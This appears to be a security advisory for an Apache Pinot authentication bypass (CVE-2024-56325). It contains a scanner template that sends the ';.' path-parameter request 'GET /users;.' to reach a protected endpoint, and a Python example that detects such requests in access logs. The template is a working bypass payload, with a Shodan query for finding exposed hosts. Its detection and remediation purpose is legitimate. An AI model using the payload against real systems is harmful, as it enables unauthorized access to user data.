This vulnerability allows remote attackers to bypass authentication on affected installations of Apache Pinot. Authentication is not required to exploit this vulnerability. The specific flaw exists within the AuthenticationFilter class. The issue results from insufficient neutralization of special characters in a URI. An attacker can leverage this vulnerability to bypass authentication on the system.
PoC code [publicly available]
id: CVE-2024-56325

info:
  name: Apache Pinot < 1.3.0 - Authentication Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    This vulnerability allows remote attackers to bypass authentication on affected installations of Apache Pinot. Authentication is not required to exploit this vulnerability. The specific flaw exists within the AuthenticationFilter class. The issue results from insufficient neutralization of special characters in a URI. An attacker can leverage this vulnerability to bypass authentication on the system.
  remediation: Fixed in version 1.3.0
  reference:
    - https://www.zerodayinitiative.com/advisories/ZDI-25-109/
    - https://github.com/advisories/GHSA-6jwp-4wvj-6597
    - https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v
    - http://www.openwall.com/lists/oss-security/2025/03/27/8
  classification:
    epss-score: 0.05963
    epss-percentile: 0.90304
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.favicon.hash:1696974531
  tags: cve,cve2024,apache,pinot,auth-bypass

http:
  - raw:
      - |
        GET /users HTTP/1.1
        Host: {{Hostname}}

    # Baseline: the endpoint must actually be protected (401/403) before
    # the bypass request is evaluated; this matcher is internal only.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 403
          - 401
        internal: true

  - raw:
      - |
        GET /users;. HTTP/1.1
        Host: {{Hostname}}

    # Same endpoint with a path parameter appended: a 200 with a users
    # list body and a Pinot controller header indicates the bypass.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"users"'

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - 'Pinot-Controller-'
# digest: 490a0046304402204d066e599446dba2030ad8f335548c894082f659b9789d294914bf26256ca7ca02201386739f967775698ab75b397aae9abe923dd64874873a3a14769fe015f4fd15:922c64590222798bb761d5b6d8e72950
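A defender-side counterpart to the template, added here as an example (it is not part of the template or of Apache Pinot's code): it canonicalizes a request path by stripping RFC 3986 path parameters and dot segments, the way an authorization check should see it, and scans constructed access-log lines for requests such as the template's `/users;.` that reached a protected path with a 200. The log lines, the log format and the `protected_prefixes` allow-list are assumptions.

```python
import re
import posixpath
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). The last line carries
# the ";." path-parameter variant the template above probes for.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Mar/2025:10:00:01 +0000] "GET /users HTTP/1.1" 401 12
10.0.0.5 - - [27/Mar/2025:10:00:02 +0000] "GET /health HTTP/1.1" 200 2
10.0.0.5 - - [27/Mar/2025:10:00:03 +0000] "GET /users;. HTTP/1.1" 200 512
"""

# Assumed common-log-format request line: method, target, protocol, status.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def normalize_path(target: str) -> str:
    """Canonicalize a request target before an auth decision: drop the query,
    percent-decode, strip ';param' from every segment, collapse repeated
    slashes and resolve '.' / '..' segments."""
    path = unquote(target.split("?", 1)[0])
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    joined = re.sub(r"/+", "/", "/".join(segments))
    if not joined.startswith("/"):
        joined = "/" + joined
    return posixpath.normpath(joined)


def has_path_parameter(target: str) -> bool:
    """True when a path segment carries a ';' parameter, which is rare in
    legitimate REST traffic and is the pattern used in the template."""
    return ";" in target.split("?", 1)[0]


def scan_access_log(log_text: str, protected_prefixes=("/users",)) -> list:
    """Flag 200 responses whose raw target differs from its canonical form
    (path parameter or dot segments) and whose canonical path is protected."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        raw, status = m.group("target"), int(m.group("status"))
        norm = normalize_path(raw)
        suspicious = has_path_parameter(raw) or norm != raw.split("?", 1)[0]
        if suspicious and norm.startswith(protected_prefixes) and status == 200:
            findings.append({"method": m.group("method"), "raw": raw,
                             "normalized": norm, "status": status})
    return findings
```

Run `scan_access_log(SAMPLE_LOG)` to see the single flagged request; the same normalization is what an authentication filter should apply before matching a path against its protected routes.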